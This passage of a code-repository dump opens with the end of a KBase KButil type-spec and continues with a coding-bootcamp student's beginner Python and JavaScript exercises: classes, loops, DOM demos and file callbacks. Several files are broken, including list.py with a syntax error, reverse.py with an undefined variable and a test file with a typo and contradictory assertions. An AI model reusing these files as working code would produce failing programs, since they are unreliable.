KButil_Logical_Slice_Two_FeatureSets_Output;\n\n funcdef KButil_Logical_Slice_Two_FeatureSets (KButil_Logical_Slice_Two_FeatureSets_Params params) returns (KButil_Logical_Slice_Two_FeatureSets_Output) authentication required;\n\n\n /* KButil_Logical_Slice_Two_AssemblySets()\n **\n ** Method for Slicing Two AssemblySets by Venn overlap\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_assemblySet_ref_A;\n\tdata_obj_ref input_assemblySet_ref_B;\n\tstring operator;\n\tstring desc;\n data_obj_name output_name;\n } KButil_Logical_Slice_Two_AssemblySets_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Logical_Slice_Two_AssemblySets_Output;\n\n funcdef KButil_Logical_Slice_Two_AssemblySets (KButil_Logical_Slice_Two_AssemblySets_Params params) returns (KButil_Logical_Slice_Two_AssemblySets_Output) authentication required;\n\n\n /* KButil_Logical_Slice_Two_GenomeSets()\n **\n ** Method for Slicing Two GenomeSets by Venn overlap\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_genomeSet_ref_A;\n\tdata_obj_ref input_genomeSet_ref_B;\n\tstring operator;\n\tstring desc;\n data_obj_name output_name;\n } KButil_Logical_Slice_Two_GenomeSets_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Logical_Slice_Two_GenomeSets_Output;\n\n funcdef KButil_Logical_Slice_Two_GenomeSets (KButil_Logical_Slice_Two_GenomeSets_Params params) returns (KButil_Logical_Slice_Two_GenomeSets_Output) authentication required;\n\n\n /* KButil_Merge_GenomeSets()\n **\n ** Method for merging GenomeSets\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_refs;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Merge_GenomeSets_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Merge_GenomeSets_Output;\n\n funcdef KButil_Merge_GenomeSets (KButil_Merge_GenomeSets_Params params) returns (KButil_Merge_GenomeSets_Output) authentication required;\n\n\n /* KButil_Build_GenomeSet()\n **\n ** Method for creating a GenomeSet\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_refs;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Build_GenomeSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Build_GenomeSet_Output;\n\n funcdef KButil_Build_GenomeSet (KButil_Build_GenomeSet_Params params) returns (KButil_Build_GenomeSet_Output) authentication required;\n\n\n /* KButil_Build_GenomeSet_from_FeatureSet()\n **\n ** Method for obtaining a GenomeSet from a FeatureSet\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_ref;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Build_GenomeSet_from_FeatureSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Build_GenomeSet_from_FeatureSet_Output;\n\n funcdef KButil_Build_GenomeSet_from_FeatureSet (KButil_Build_GenomeSet_from_FeatureSet_Params params) returns (KButil_Build_GenomeSet_from_FeatureSet_Output) authentication required;\n\n\n /* KButil_Add_Genomes_to_GenomeSet()\n **\n ** Method for adding Genomes to a GenomeSet\n */\n typedef structure {\n workspace_name workspace_name;\n\tlist<data_obj_ref> input_genome_refs;\n data_obj_ref input_genomeset_ref;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Add_Genomes_to_GenomeSet_Params;\n\n typedef structure 
{\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Add_Genomes_to_GenomeSet_Output;\n\n funcdef KButil_Add_Genomes_to_GenomeSet (KButil_Add_Genomes_to_GenomeSet_Params params) returns (KButil_Add_Genomes_to_GenomeSet_Output) authentication required;\n\n\n /* KButil_Remove_Genomes_from_GenomeSet()\n **\n ** Method for removing Genomes from a GenomeSet\n */\n typedef structure {\n workspace_name workspace_name;\n\tlist<data_obj_ref> input_genome_refs;\n\tlist<data_obj_name> nonlocal_genome_names;\n data_obj_ref input_genomeset_ref;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Remove_Genomes_from_GenomeSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Remove_Genomes_from_GenomeSet_Output;\n\n funcdef KButil_Remove_Genomes_from_GenomeSet (KButil_Remove_Genomes_from_GenomeSet_Params params) returns (KButil_Remove_Genomes_from_GenomeSet_Output) authentication required;\n\n\n /* KButil_Build_ReadsSet()\n **\n ** Method for creating a ReadsSet\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_refs;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Build_ReadsSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Build_ReadsSet_Output;\n\n funcdef KButil_Build_ReadsSet (KButil_Build_ReadsSet_Params params) returns (KButil_Build_ReadsSet_Output) authentication required;\n\n\n /* KButil_Merge_MultipleReadsSets_to_OneReadsSet()\n **\n ** Method for merging multiple ReadsSets into one ReadsSet\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_refs; /* ReadsSets */\n data_obj_name output_name; /* ReadsSet */\n\tstring desc;\n } KButil_Merge_MultipleReadsSets_to_OneReadsSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Merge_MultipleReadsSets_to_OneReadsSet_Output;\n\n funcdef KButil_Merge_MultipleReadsSets_to_OneReadsSet (KButil_Merge_MultipleReadsSets_to_OneReadsSet_Params params) returns (KButil_Merge_MultipleReadsSets_to_OneReadsSet_Output) authentication required;\n\n\n /* KButil_Build_AssemblySet()\n **\n ** Method for creating an AssemblySet\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_refs;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Build_AssemblySet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Build_AssemblySet_Output;\n\n funcdef KButil_Build_AssemblySet (KButil_Build_AssemblySet_Params params) returns (KButil_Build_AssemblySet_Output) authentication required;\n\n\n /* KButil_Batch_Create_ReadsSet()\n **\n ** Method for creating a ReadsSet without specifying individual objects\n */\n typedef structure {\n workspace_name workspace_name;\n\tstring name_pattern;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Batch_Create_ReadsSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Batch_Create_ReadsSet_Output;\n\n funcdef KButil_Batch_Create_ReadsSet (KButil_Batch_Create_ReadsSet_Params params) returns (KButil_Batch_Create_ReadsSet_Output) authentication required;\n\n\n /* KButil_Batch_Create_AssemblySet()\n **\n ** Method for creating an AssemblySet without specifying individual objects\n */\n typedef structure {\n workspace_name workspace_name;\n\tstring name_pattern;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Batch_Create_AssemblySet_Params;\n\n typedef structure 
{\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Batch_Create_AssemblySet_Output;\n\n funcdef KButil_Batch_Create_AssemblySet (KButil_Batch_Create_AssemblySet_Params params) returns (KButil_Batch_Create_AssemblySet_Output) authentication required;\n\n\n /* KButil_Batch_Create_GenomeSet()\n **\n ** Method for creating a GenomeSet without specifying individual objects\n */\n typedef structure {\n workspace_name workspace_name;\n\tstring name_pattern;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Batch_Create_GenomeSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Batch_Create_GenomeSet_Output;\n\n funcdef KButil_Batch_Create_GenomeSet (KButil_Batch_Create_GenomeSet_Params params) returns (KButil_Batch_Create_GenomeSet_Output) authentication required;\n\n\n\n};\n\n"
}
] | 5 |
greenfox-academy/HDodek
|
https://github.com/greenfox-academy/HDodek
|
3eff3fff1325fd46757e9e9320f1106ce1324cb1
|
49be69d3f9c744945bbf35d4b1462e6191826a63
|
3af970c3a326679a21da255383b00418a66b7c66
|
refs/heads/master
| 2021-01-10T10:51:16.467301 | 2016-01-21T23:49:35 | 2016-01-21T23:49:35 | 45,946,509 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5126262903213501,
"alphanum_fraction": 0.5454545617103577,
"avg_line_length": 16.217391967773438,
"blob_id": "43632a218ac24cf0f914fe8060729f376b0c5fd3",
"content_id": "e64f9481877fcf1ca2b0606e6d40f3f725cfa4f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 396,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 23,
"path": "/week-4/practice/35.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "numbers = [3, 4, 5, 6, 7]\n\ndef reverse():\n output = []\n num = len(numbers) - 1\n while num >= 0:\n output.append(numbers[num])\n num -= 1\n return output\n\nprint(reverse())\n\n\n\ndef reverse2(input_list):\n output_list = []\n i = len(input_list) - 1\n while i >= 0:\n output_list.append(input_list[i])\n i -= 1\n return output_list\n\nprint(reverse2(numbers))\n"
},
{
"alpha_fraction": 0.4804270565509796,
"alphanum_fraction": 0.5255041718482971,
"avg_line_length": 19.071428298950195,
"blob_id": "d87592e6c25c6ce3e25c8c2a181f5ce892872b91",
"content_id": "0cc6d6f373d0e788cca3fe4dc38f6411de797fc4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 843,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 42,
"path": "/week-7/wednesday/multiply.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nfunction multiply(number) {\n for (var i = 1; i <= 10; i++)\n console.log(String(i), '*', String(number), '=', number * i);\n}\n\nmultiply(5);\n\n\nfunction multiplyAll() {\n for (var a = 1; a <= 10; a++) {\n for (var b = 1; b <= 10; b++) {\n console.log(String(b), '*', String(a), '=', a * b);\n }\n }\n}\n\nmultiplyAll()\n\n//for, forEach, map, reduce\n\nvar szorzotabla1 = \"\";\n\nfor (var i = 1; i <= 10; i++) {\n szorzotabla1 += i + \"*\" + 4 + \"=\" + i*4 + '\\n';\n}\nconsole.log(szorzotabla1);\n\nvar szamok = [1, 2, 3, 4, 5, 6, 7, 8, 10];\nvar szorzotabla2 = \"\";\nszamok.forEach(function (e) {\n szorzotabla2 += e + \"*\" + 4 + \"=\" + e * 4 + '\\n';\n})\nconsole.log(szorzotabla2);\n\nvar szorzotabla3 = \"\";\nvar sorok = szamok.map(function (e) {\n return e + \"*\" + 4 + \"=\" + e * 4;\n});\nszorzotabla3 = sorok.join('\\n');\nconsole.log(szorzotabla3);\n"
},
{
"alpha_fraction": 0.5826494693756104,
"alphanum_fraction": 0.6072684526443481,
"avg_line_length": 26.516128540039062,
"blob_id": "33c1ab8bbda8a916b090a32b7f216edc6cd291c3",
"content_id": "a27070c0b906dc63b62afbedc66af37689a8693b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 853,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 31,
"path": "/week-4/monday/rpg.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class Game_Character():\n def __init__(self, name, health_potions, damage):\n self.name = name\n self.health_potions = health_potions\n self.damage = damage\n\n def print_status(self):\n if self.health_potions <= 0:\n print(self.name + \" \" + \"is dead!\")\n elif self.health_potions > 0:\n print(self.name + \" \" \"HP \" + str(self.health_potions))\n\n def drink_potion(self):\n self.health_potions += 10\n\n def strike(self, other):\n other.health_potions -= self.damage\n\nclass Wizard(Game_Character):\n def heal(self, ally):\n ally.health_potions += 10\n\nalena = Game_Character(\"Alena\", 100, 50)\nbergu = Game_Character(\"Bergu\", 65, 150)\nmelkor = Wizard(\"Melkor\", 60, 60)\n\nalena.print_status()\nfor i in range(2):\n bergu.strike(alena)\n melkor.heal(alena)\nalena.print_status()\n"
},
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.60317462682724,
"avg_line_length": 8,
"blob_id": "9a6a3a41419f4b6f708c26fd4a658d11f80ae57c",
"content_id": "6b1778aa5cb298164662393325694b115f65ec79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 63,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 7,
"path": "/week-7/wednesday/hoisting.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar a;\nconsole.log(a);\n\na = 12;\nconsole.log(a);\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5625,
"avg_line_length": 7,
"blob_id": "608d64317695152fb3b5005fe8871d78430d03b1",
"content_id": "af8e196e2ac8a4541c4c9068fb1c079c5f4fba3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 6,
"path": "/week-7/tuesday/helloworld.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar a = 123;\n\n\nconsole.log(++a);\n"
},
{
"alpha_fraction": 0.5894245505332947,
"alphanum_fraction": 0.6143079400062561,
"avg_line_length": 21.964284896850586,
"blob_id": "8c989501d479c4b1a0a484d44c017ee9a865fd85",
"content_id": "e1c274af3e43bcb154e8e8ae8dd76f32304f1975",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 643,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 28,
"path": "/week-4/monday/bank.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class Bank_account:\n def __init__(self, name, balance):\n self.name = name\n self.balance = balance\n\n def pay(self, amount):\n self.balance -= amount\n\n def receive(self, amount):\n self.balance += amount\n\n def print_balance(self):\n print (\"balance of \")\n print(self.name)\n print(\"is\")\n print(self.balance)\n\n def transfer(self, other_account, amount):\n self.pay(amount)\n other_account.receive(amount)\n\nferi = Bank_account( \"Feri\", 700000)\nszamla = Bank_account(\"Bela\", 1000)\nszamla.pay(50)\n\nszamla.transfer(feri, 6000)\nferi.print_balance()\nszamla.print_balance()\n"
},
{
"alpha_fraction": 0.5549132823944092,
"alphanum_fraction": 0.5664739608764648,
"avg_line_length": 14.727272987365723,
"blob_id": "5d61a8a6241b9d3561a8164eb16c0bc85246fee7",
"content_id": "f542e8885075cef5c197294d04b1076361dc20fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 11,
"path": "/week-7/practice/range2.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nfunction range(first, last) {\n var output = [];\n for (var i = first; i <= last; i++){\n output.push(i);\n }\n return output;\n}\n\nconsole.log(range(3, 6));\n"
},
{
"alpha_fraction": 0.6686046719551086,
"alphanum_fraction": 0.6744186282157898,
"avg_line_length": 16.200000762939453,
"blob_id": "0203bf29d6f41614dd8268525d6be363bd274668",
"content_id": "ad2a47e6f41a1e6d5ed399d946c383b51ead5d71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 172,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 10,
"path": "/week-4/tuesday/crypt/reversed_zen_order_solution.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "my_file = open( \"reversed_zen_order.txt\")\n\nlines = my_file.readlines()\n\nmy_file.close()\n\nreversed_lines = lines[::-1]\n\nfor line in reversed_lines:\n print(line.rstrip())\n"
},
{
"alpha_fraction": 0.5447154641151428,
"alphanum_fraction": 0.5447154641151428,
"avg_line_length": 9.25,
"blob_id": "26f865ecd8ff4267841a9fab13930c213a8b66d1",
"content_id": "afc238335e3215aa3f7e036fa560822eeb425a43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 12,
"path": "/week-4/practice/30.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "ae = \"Jozsi\"\n\ndef greet():\n print( \" Hello\" + ae)\n\ngreet()\n\n---\ndef greet(name):\n print(\"Szevasz\" + name)\n\ngreet(ae)\n"
},
{
"alpha_fraction": 0.7096773982048035,
"alphanum_fraction": 0.7161290049552917,
"avg_line_length": 50.66666793823242,
"blob_id": "5156c4e97c1873356ded1a9c0b3b36efa000126a",
"content_id": "71ada1565c41647fd6ba8ba3de94e277dc4d02f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 155,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 3,
"path": "/week-7/md.md",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "# Why *you* should use Markdown to write your next blog post\n\n[Markdown][1] is just so dang legible, it will make your *whole life* easier. **I promise.**\n"
},
{
"alpha_fraction": 0.46875,
"alphanum_fraction": 0.5078125,
"avg_line_length": 13.222222328186035,
"blob_id": "c3e992102e06655e9c475f3977f429b727bb9c54",
"content_id": "89609c518e841e1d0c17ad899cec7b9c4b98350e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 384,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 27,
"path": "/week-7/practice/1.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar grades = [4, 3, 5, 2, 5, 5];\n\nfunction count5s() {\n var output = 0;\n for (var i = 0; i < grades.length; i++) {\n if (grades[i] === 5) {\n output += 1;\n }\n }\n return output;\n}\n\nconsole.log(count5s());\n\nfunction foreach() {\n var out = 0;\n grades.forEach(function(e) {\n if (e === 5) {\n out += 1;\n }\n})\n return out;\n};\n\nconsole.log(foreach());\n"
},
{
"alpha_fraction": 0.5102880597114563,
"alphanum_fraction": 0.5432098507881165,
"avg_line_length": 17.69230842590332,
"blob_id": "09d1b9edfe86f18576b07c77d0e3b192edd03b53",
"content_id": "2d8b6114dd1a16b920e5300e1ba20170aa4a96a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 243,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 13,
"path": "/week-4/practice/car2.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class Car:\n def __init__(self, color, type, km):\n self.color = color\n self.type = type\n self.km = km\n\n def ride(self, km):\n self.km += km\n\ntesla = Car(\"pink\", \"TeslaX\", 1200)\ntesla.ride(2300)\n\nprint(tesla.km)\n"
},
{
"alpha_fraction": 0.5429936051368713,
"alphanum_fraction": 0.6035031676292419,
"avg_line_length": 27.545454025268555,
"blob_id": "700aff9c2fe4086221b43cf7401f1fb780a48db0",
"content_id": "b570b79b8d2ec8c036b0984923d4b3831f15bd40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1256,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 44,
"path": "/week-5/monday/rpg/wizard_test.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom wizard import Wizard\n\nclass TestWizard(unittest.TestCase):\n def test_existance(self):\n wizard = Wizard(\"Test\", 40, 10, 20)\n\n def test_inheritance(self):\n wizard = Wizard(\"Test\", 40, 10, 20)\n self.assertEqual(wizard.hp, 40)\n\n def test_manna(self):\n wizard = Wizard(\"Test\", 40, 10, 20)\n self.assertEqual(wizard.manna, 20)\n\n def test_strike(self):\n wizard = Wizard(\"Test\", 40, 10, 20)\n opponent = Wizard(\"Opponent\", 40, 10, 20)\n wizard.strike(opponent)\n self.assertEqual(wizard.manna, 15)\n\n def test_no_manna(self):\n wizard = Wizard(\"Test\", 40, 10, 0)\n opponent = Wizard(\"Opponent\", 40, 10, 20)\n wizard.strike(opponent)\n self.assertEqual(wizard.manna, 0)\n\n def test_more_than_5_manna(self):\n wizard = Wizard(\"Test\", 40, 10, 20)\n opponent = Wizard(\"Opponent\", 40, 10, 20)\n self.assertEqual(wizard.manna, 15)\n wizard.strike(opponent)\n sels.assertEqual(opponent.hp, 0)\n\n def test_strike_without_manna(self):\n wizard = Wizard(\"Test\", 40, 5, 0)\n opponent = Wizard(\"Opponent\", 40, 10, 20)\n wizard.strike(opponent)\n self.assertEqual(opponent.hp, 27)\n\n\n\n\nunittest.main()\n"
},
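The test file above imports `Wizard` from a wizard module that is not included in this dump, and the hp expectations in its last two tests look unfinished, so they cannot be verified here. A minimal sketch consistent with the constructor shape and the manna accounting (a strike spends 5 manna when available; with no manna, nothing is spent):

```python
# Minimal sketch, inferred only from the tests above; the real
# wizard.py is not in this dump, so this models just the constructor
# shape and the manna accounting that the passing assertions imply.
class Wizard:
    def __init__(self, name, hp, damage, manna):
        self.name = name
        self.hp = hp
        self.damage = damage
        self.manna = manna

    def strike(self, opponent):
        if self.manna >= 5:
            self.manna -= 5  # a strike costs 5 manna when available
        opponent.hp -= self.damage
```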
{
"alpha_fraction": 0.6359090805053711,
"alphanum_fraction": 0.7159090638160706,
"avg_line_length": 32.846153259277344,
"blob_id": "dd4f43f7e1177dbfe7c978d9574d300efffb32ec",
"content_id": "6ce2fbcbed8cfdf4d2893a384538eb766a14b4f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2200,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 65,
"path": "/week-7/thursday/majom.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nconsole.log(\"mukodik\");\n\nvar cim = document.querySelector(\".majom\");\nconsole.log(cim);\n\ncim.classList.add(\"piros\");\n\nvar majomkep = document.querySelector(\"img\");\nmajomkep.setAttribute(\"src\", \"https://41.media.tumblr.com/84729c469ca431c8c80dad1cd4281205/tumblr_o08zo7SJan1tx21ogo1_540.jpg\");\n\nfunction kepcsinalo(src) {\n var ujkep = document.createElement(\"img\");\n ujkep.setAttribute(\"src\", src);\n\n var bodyvaltozoban = document.querySelector(\"body\")\n bodyvaltozoban.appendChild(ujkep);\n}\nfor (var i = 0; i < 10; i++) {\nkepcsinalo(\"https://41.media.tumblr.com/84729c469ca431c8c80dad1cd4281205/tumblr_o08zo7SJan1tx21ogo1_540.jpg\");\n};\n\nvar kepek = [\n \"https://s-media-cache-ak0.pinimg.com/736x/eb/ff/38/ebff38063b30af2bd2abaa79827a3fd3.jpg\",\n \"http://cdn.meme.am/instances/500x/53203200.jpg\",\n \"http://lorempixel.com/image_output/cats-q-c-301-222-9.jpg\",\n \"http://lorempixel.com/image_output/animals-q-c-448-371-1.jpg\",\n \"http://lorempixel.com/image_output/city-q-c-448-371-2.jpg\",\n \"http://lorempixel.com/image_output/people-q-c-448-371-5.jpg\",\n \"http://lorempixel.com/image_output/food-q-c-448-371-6.jpg\",\n \"http://lorempixel.com/image_output/food-q-c-448-371-4.jpg\",\n \"http://lorempixel.com/image_output/nightlife-q-c-448-371-3.jpg\",\n \"http://lorempixel.com/image_output/nature-q-c-448-371-7.jpg\"\n]\nfor (var i = 0; i < kepek.length; i++) {\n kepcsinalo(kepek[i]);\n};\n\nvar gomb = document.querySelector(\".csing\");\n\n//gomb.addEventListener(\"click\", function () {\n// alert(\"kattintottam!!\");\n//});\n\ngomb.addEventListener(\"click\", function () {\n kepcsinalo(\"https://media.giphy.com/media/vhsNmFjuN4WDS/giphy.gif\")\n});\nwindow.addEventListener(\"scroll\", function (){\n console.log(\"scroll\"),\n console.log(window.scrollY);\n});\n\n\nvar cicagomb = document.querySelector(\".cicat\");\nvar kajagomb = document.querySelector(\".kajat\");\nvar valtokep = document.querySelector(\".cicakaja\");\n\nkajagomb.addEventListener(\"click\", function() {\n valtokep.setAttribute(\"src\", \"http://lorempixel.com/image_output/nature-q-c-448-371-7.jpg\");\n});\n\ncicagomb.addEventListener(\"click\", function() {\n valtokep.setAttribute(\"src\", \"http://lorempixel.com/image_output/cats-q-c-301-222-9.jpg\");\n});\n"
},
{
"alpha_fraction": 0.5419847369194031,
"alphanum_fraction": 0.5419847369194031,
"avg_line_length": 25.200000762939453,
"blob_id": "b87031b640b2938e9f65c338b2a26d7d75e88320",
"content_id": "78717ac67e902eb86b0a7ef0d8d9877b8feb91b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 262,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 10,
"path": "/week-3/wednesday/reverse.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class SuperString(object):\n def __init__(self, my_greet):\n self.greet = greet\n\n def reversed(self):\n n = len(self.greet)\n reversed = \"\"\n for i in range(n):\n reversed = self.greet(i) + reversed\n return reversed\n"
},
{
"alpha_fraction": 0.562974214553833,
"alphanum_fraction": 0.5720788836479187,
"avg_line_length": 15.897436141967773,
"blob_id": "3cc362207f52df91f5bd13cedd13af777208c55a",
"content_id": "ff174449a5e2ff524e4819ef36e477001fa8276b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 659,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 39,
"path": "/week-3/tuesday/list.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class Elem(object):\n _slots_ = [\n \"value\",\n \"next\"\n]\n\ndef _repr_(self):\n return \"({}, {})\".format(self.value, self.next)\n\ndef new_elem(value):\n elem = Elem()\n elem.value = value\n elem.next = None\n return elem\n\ndef append(head, value):\n end = head\n while end.next is not None:\n end = end.next\n end.next = new_elem(value)\n return head\n\nhead = insert(head, 1, 3)\ndef insert(head, index, value):\n if index = 0:\n new = new_elem(value)\n new.next = head\n return new\n\n\ndef remove(head,index):\n prev=head\n i=0\n while i<index-1:\n prev=prev.next\n i+=1\n\nelem = prev.next\nprev.next = elem.next\n"
},
{
"alpha_fraction": 0.5684210658073425,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 11.666666984558105,
"blob_id": "1bfcba2b31400e3ae29aaeac9fd8eb43939f446d",
"content_id": "94af3e6bc84ed9de537a79e6c9bd22bb2fe67bd6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 190,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 15,
"path": "/week-7/wednesday/scope2.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar glob = 7;\nvar c = 8;\n\nfunction printLocal() {\n var a = 123\n var c = 9\n console.log(a);\n console.log(glob);\n console.log('local', c);\n}\n\nprintLocal();\nconsole.log(c);\n"
},
{
"alpha_fraction": 0.5645569562911987,
"alphanum_fraction": 0.5721518993377686,
"avg_line_length": 18.75,
"blob_id": "2371ba9c75afdfa3b07bad4055282e43385a5abe",
"content_id": "3e8a719783fda98133c8678fbc79dbe767974479",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 395,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 20,
"path": "/week-8/thursday/callback4.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\"\n\nvar fs = require(\"fs\");\n\nfunction countLetterP(callback) {\n fs.readFile(\"alma.txt\", function(err, content) {\n var count = 0;\n var stringoutput = String(content);\n for (var i = 0; i < stringoutput.length; i++) {\n if (stringoutput[i] === \"p\") {\n count++;\n }\n }\n callback(count);\n })\n}\n\ncountLetterP(function(count) {\n console.log(count); //2//\n});\n"
},
{
"alpha_fraction": 0.6187050342559814,
"alphanum_fraction": 0.6258992552757263,
"avg_line_length": 14.44444465637207,
"blob_id": "837257bc61e27214055cdb673f761fec621c0a33",
"content_id": "ea1ea296323dfd531bdcda8a1083668e0bdac1c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 139,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 9,
"path": "/week-4/tuesday/crypt/reversed_zen_lines_solution.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "my_file = open( \"reversed_zen_lines.txt\")\n\nlines = my_file.readlines()\n\n\nfor line in lines:\n print(line[::-1], end=\"\")\n\nmy_file.close()\n"
},
{
"alpha_fraction": 0.5489130616188049,
"alphanum_fraction": 0.5597826242446899,
"avg_line_length": 25.14285659790039,
"blob_id": "6e337a96cec9a7c76606f8e6b4332c0b7ad36d6c",
"content_id": "13ea52157cee4198f04982be64614e944c67da46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 7,
"path": "/week-5/monday/countletters/countletters.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\ndef count_letters(input_string):\n output = {}\n for char in input_string:\n if not char in output:\n output[char] = 0\n output[char] += 1\n return output\n"
},
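The hand-rolled tally in countletters.py is equivalent to `collections.Counter` from the standard library; a quick sketch of the comparison (assuming the file above is importable as a module):

```python
from collections import Counter

from countletters import count_letters  # assumes the file above is on the path

text = "mississippi"
assert count_letters(text) == dict(Counter(text))
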